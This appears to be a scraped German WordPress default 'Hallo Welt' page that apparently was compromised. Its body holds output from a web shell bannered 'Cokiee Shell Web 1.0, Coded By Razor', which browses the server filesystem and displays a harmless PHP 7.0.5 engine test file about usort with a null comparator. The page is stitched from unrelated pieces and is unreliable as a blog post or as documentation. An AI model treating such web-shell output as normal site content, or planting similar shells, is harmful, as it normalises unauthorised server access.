Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/methods-on-non-objects-usort.phpt |
--TEST-- usort() in combination with "Call to a member function method() on null" --FILE-- <?php set_error_handler(function($code, $message) { var_dump($code, $message); }); $comparator= null; $list= [1, 4, 2, 3, -1]; usort($list, function($a, $b) use ($comparator) { try { return $comparator->compare($a, $b); } catch (Error $e) { var_dump($e->getCode(), $e->getMessage()); return 0; } }); var_dump($list); echo "Alive\n"; ?> --EXPECTF-- int(0) string(43) "Call to a member function compare() on null" int(0) string(43) "Call to a member function compare() on null" int(0) string(43) "Call to a member function compare() on null" int(0) string(43) "Call to a member function compare() on null" array(5) { [0]=> int(1) [1]=> int(4) [2]=> int(2) [3]=> int(3) [4]=> int(-1) } Alive
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare